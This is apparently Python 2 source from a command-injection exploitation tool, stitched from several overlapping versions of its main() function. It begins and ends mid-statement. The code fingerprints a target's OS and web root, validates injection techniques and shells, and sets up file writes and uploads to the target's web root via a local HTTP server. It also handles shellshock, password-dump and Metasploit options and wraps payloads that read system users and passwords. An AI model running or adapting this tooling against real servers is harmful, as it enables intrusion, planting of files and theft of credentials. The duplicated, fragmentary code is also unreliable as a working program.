Style.RESET_ALL print settings.print_success_msg(success_msg) try: if response.info()['server']: server_banner = response.info()['server'] found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS for i in range(0, len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower( ) in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[ i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft": identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[: 3].lower( ) if menu.options.shellshock: err_msg = "The shellshock module is not available for " err_msg += identified_os + " targets." print settings.print_critical_msg( err_msg) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os found_server_banner = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target server... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for i in range(0, len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower( ) in server_banner.lower(): if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if settings.VERBOSITY_LEVEL >= 1: success_msg = "The server was identified as " success_msg += server_banner + Style.RESET_ALL + "." print settings.print_success_msg( success_msg) settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower( ) == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower( ) == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower( ) == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if not found_server_banner: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify server." print settings.print_warning_msg(warn_msg) # Load tamper scripts if menu.options.tamper: checks.tamper_scripts() # Store the Server's root dir settings.DEFAULT_SRV_ROOT_DIR = settings.SRV_ROOT_DIR if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root: warn_msg = "Swithing '--is-root' to '--is-admin' because the " warn_msg += "target has been identified as windows." print settings.print_warning_msg(warn_msg) if menu.options.passwords: warn_msg = "The '--passwords' option, is not yet available for Windows targets." print settings.print_warning_msg(warn_msg) if menu.options.file_upload: warn_msg = "The '--file-upload' option, is not yet available for windows targets. " warn_msg += "Instead, use the '--file-write' option." print settings.print_warning_msg(warn_msg) sys.exit(0) else: if menu.options.is_admin: warn_msg = "Swithing the '--is-admin' to '--is-root' because " warn_msg += "the target has been identified as unix-like. " print settings.print_warning_msg(warn_msg) if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: warn_msg = "Heuristics have failed to identify server's operating system." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you recognise the server's operating system? " question_msg += "[(W)indows/(U)nix/(q)uit] > " sys.stdout.write( settings.print_question_msg( question_msg)) got_os = sys.stdin.readline().replace( "\n", "").lower() if got_os.lower() in settings.CHOICE_OS: if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" err_msg = "'" + got_os + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if not menu.options.os: if found_server_banner == False: warn_msg = "The server which was identified as " warn_msg += server_banner + " seems unknown." print settings.print_warning_msg(warn_msg) else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection. requests.charset_detection(response)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) if not menu.options.method: menu.options.method = "GET" if menu.options.method != "GET" and menu.options.method != "POST": print colors.RED + "(x) Error: HTTP method must be GET or POST.\n" + colors.RESET sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) if menu.options.url: url = menu.options.url if menu.options.method == "POST": if not menu.options.parameter: print colors.RED + "(x) Error: You must specify the testable parameter for 'POST' method.\n" + colors.RESET sys.exit(0) else: parameter = menu.options.parameter try: request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) response = urllib2.urlopen(request) content = response.read() except urllib2.HTTPError, e: if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: print colors.RED + "(x) Error: Authorization required!\n" + colors.RESET sys.exit(0) elif e.getcode() == 404: print colors.RED + "(x) Error: The host seems to be down!\n" + colors.RESET sys.exit(0) else: raise except urllib2.URLError, e: print colors.RED + "(x) Error: The host seems to be down!" + colors.RESET sys.exit(0)
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 4: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 4]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Define the local path where Metasploit Framework is installed. if menu.options.msf_path: settings.METASPLOIT_PATH = menu.options.msf_path # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True # Target URL reload. if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split( settings.PARAMETER_SPLITTING_REGEX) for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check if ".git" exists and check for updated version! if os.path.isdir("./.git") and settings.CHECK_FOR_UPDATES_ON_START: update.check_for_update() # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split( settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) # Load the crawler if menu.options.crawldepth > 0: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth url = crawler.crawler(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname( os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) #headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() if menu.options.flush_session: session_handler.flush(url) info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 2: print "" headers.check_http_traffic(request) try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.HTTPError, e: if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = str(e).replace(": ", " (") + ")." print settings.print_critical_msg(err_msg) raise SystemExit html_data = content = response.read() if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: question_msg = "Do you want to enable an HTTP server? [Y/n/q] > " sys.stdout.write( settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline().replace( "\n", "").lower() if len(enable_HTTP_server) == 0: enable_HTTP_server = "y" if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile( menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write( settings.print_critical_msg(err_msg) + "\n") sys.exit(0) http_server = "http://" + str( settings.LOCAL_HTTP_IP) + ":" + str( settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0)
def main(): try: #Call the banner menu.banner() # Check python version number. version.python_version() #Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) #Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) #Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) #Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() #Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and found_tech == False: print Back.RED + "(x) Error: You specified wrong '" + split_techniques_names[i] + "' injection technique." + Style.RESET_ALL print Back.RED + "(x) The available techniques are: classic,eval-based,time-based,file-based or c,e,t,f (with or without commas)." + Style.RESET_ALL sys.exit(0) # Cookie Injection if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: settings.COOKIE_INJECTION = True #Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: print Back.RED + "(x) Error: '" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check if specified file-access options # Check if not defined "--file-dest" option. if menu.options.file_dest == None: # Check if defined "--file-write" option. if menu.options.file_write: file_name = os.path.split(menu.options.file_write)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # Check if defined "--file-upload" option. if menu.options.file_upload: file_name = os.path.split(menu.options.file_upload)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name elif menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) #Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) #Check if defined "--url" option. if menu.options.url: sys.stdout.write("(*) Checking connection to the target URL... ") sys.stdout.flush() url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url try: request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) response = urllib2.urlopen(request) content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" #Check if defined "--tor" option. if menu.options.tor: tor.do_check() except urllib2.HTTPError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" # Check the codes of responses if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print Back.RED + "(x) Error: Only 'Basic' Access Authentication is supported." + Style.RESET_ALL sys.exit(0) else: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 404: print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL + "\n" sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL + "\n" sys.exit(0)
def main(): try: # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and found_tech == False: print Back.RED + "(x) Error: You specified wrong '" + split_techniques_names[i] + "' injection technique." + Style.RESET_ALL print Back.RED + "(x) The available techniques are: classic,eval-based,time-based,file-based or c,e,t,f (with or without commas)." + Style.RESET_ALL sys.exit(0) # Cookie Injection if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: settings.COOKIE_INJECTION = True # User-Agent Injection if menu.options.agent and settings.INJECT_TAG in menu.options.agent: settings.USER_AGENT_INJECTION = True # Referer Injection if menu.options.referer and settings.INJECT_TAG in menu.options.referer: settings.REFERER_INJECTION = True # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: print Back.RED + "(x) Error: '" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): sys.stdout.write(Back.RED + "(x) Error: The '"+ menu.options.file_upload + "' is not a valid URL. " + Style.RESET_ALL + "\n") sys.stdout.flush() sys.exit(0) # Check if specified file-access options # Check if not defined "--file-dest" option. if menu.options.file_dest == None: # Check if defined "--file-write" option. if menu.options.file_write: file_name = os.path.split(menu.options.file_write)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name # Check if defined "--file-upload" option. if menu.options.file_upload: file_name = os.path.split(menu.options.file_upload)[1] menu.options.file_dest = settings.SRV_ROOT_DIR + file_name elif menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : print Back.RED + "(x) Error: You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: sys.stdout.write("(*) Checking connection to the target URL... ") sys.stdout.flush() url = menu.options.url # If URL not starts with any URI scheme, add "http://" if not urlparse.urlparse(url).scheme: url = "http://" + url if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: request = urllib2.Request(url) # Check if defined extra headers. headers.do_check(request) response = urllib2.urlopen(request) html_data = response.read() content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Charset detection [1]. # [1] http://www.w3schools.com/html/html_charset.asp # Check if HTML4 format content = re.findall(r";charset=(.*)\"", html_data) if len(content) != 0 : charset = content else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*)['\"]", html_data) if len(charset) != 0 : settings.CHARSET = charset[len(charset)-1] if settings.CHARSET.lower() not in settings.CHARSET_LIST: print Fore.YELLOW + "(^) Warning: The indicated web-page charset '" + settings.CHARSET + "' seems unknown." + Style.RESET_ALL else: if menu.options.verbose: print "(*) The indicated web-page charset is '" + settings.CHARSET + "'." # Check if defined "--tor" option. if menu.options.tor: tor.do_check() except urllib2.HTTPError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" # Check the codes of responses if e.getcode() == 500: content = e.read() sys.exit(0) elif e.getcode() == 401: if menu.options.auth_type != "basic": print Back.RED + "(x) Error: Only 'Basic' Access Authentication is supported." + Style.RESET_ALL sys.exit(0) else: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 404: print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL + "\n" sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" print Back.RED + "(x) Error: The host seems to be down!" + Style.RESET_ALL + "\n" sys.exit(0)
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and found_tech == False: error_msg = "You specified wrong value '" + split_techniques_names[i] + "' as injection technique. " \ "The value, must be a string composed by the letters (C)lassic, (E)val-based, " \ "(T)ime-based, (F)ile-based (with or without commas)." print Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL sys.exit(0) # Cookie Injection if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: settings.COOKIE_INJECTION = True # User-Agent Injection if menu.options.agent and settings.INJECT_TAG in menu.options.agent: settings.USER_AGENT_INJECTION = True # Referer Injection if menu.options.referer and settings.INJECT_TAG in menu.options.referer: settings.REFERER_INJECTION = True # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: print Back.RED + settings.ERROR_SIGN + "'" + menu.options.alter_shell + "' shell is not supported!" + Style.RESET_ALL sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: print Back.RED + settings.ERROR_SIGN + "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." + Style.RESET_ALL sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : print Back.RED + settings.ERROR_SIGN + "You must enter the '--file-write' or '--file-upload' parameter." + Style.RESET_ALL sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): print Back.RED + settings.ERROR_SIGN + "The '" + menu.options.file_upload + "' is not a valid URL. " + Style.RESET_ALL sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname(os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() sys.stdout.write(settings.INFO_SIGN + "Checking connection to the target URL... ") sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" error_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' to provide an HTTP header or '--headers=\"HEADER_NAME:" + settings.INJECT_TAG + "\"' if you want to try to exploit the provided HTTP header." print Back.RED + settings.ERROR_SIGN + error_msg + Style.RESET_ALL sys.exit(0) except: raise html_data = response.read() content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Used a valid pair of valid credentials if menu.options.auth_cred: print Style.BRIGHT + "(!) Identified a valid pair of credentials '" + Style.UNDERLINE + menu.options.auth_cred + Style.RESET_ALL + Style.BRIGHT + "'." + Style.RESET_ALL try: if response.info()['server'] : server_banner = response.info()['server'] found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS for i in range(0,len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower() in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft" : identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: print Back.RED + settings.CRITICAL_SIGN + "The shellshock module is not available for " + identified_os + " targets." + Style.RESET_ALL raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os found_server_banner = False for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if menu.options.verbose: print Style.BRIGHT + "(!) The server was identified as " + Style.UNDERLINE + server_banner + Style.RESET_ALL + "." + Style.RESET_ALL settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower() == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root : print Fore.YELLOW + settings.WARNING_SIGN + "Swithing '--is-root' to '--is-admin' because the target has been identified as windows." + Style.RESET_ALL error_msg = settings.WARNING_SIGN + "The '--passwords' option, is not yet available for Windows targets." if menu.options.passwords: print Fore.YELLOW + settings.WARNING_SIGN + "The '--passwords' option, is not yet available for Windows targets." + Style.RESET_ALL if menu.options.file_upload : print Fore.YELLOW + settings.WARNING_SIGN + "The '--file-upload' option, is not yet available for windows targets. Instead, use the '--file-write' option." + Style.RESET_ALL sys.exit(0) else: if menu.options.is_admin : print Fore.YELLOW + settings.WARNING_SIGN + "Swithing the '--is-admin' to '--is-root' because the target has been identified as unix-like. " + Style.RESET_ALL if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: print Fore.YELLOW + settings.WARNING_SIGN + "Heuristics have failed to identify server's operating system." + Style.RESET_ALL while True: got_os = raw_input(settings.QUESTION_SIGN + "Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > ").lower() if got_os.lower() in settings.CHOICE_OS : if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" print Back.RED + settings.ERROR_SIGN + "'" + got_os + "' is not a valid answer." + Style.RESET_ALL + "\n" pass if not menu.options.os: if found_server_banner == False: print Fore.YELLOW + settings.WARNING_SIGN + "The server which was identified as " + server_banner + " seems unknown." + Style.RESET_ALL else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection [1]. # [1] 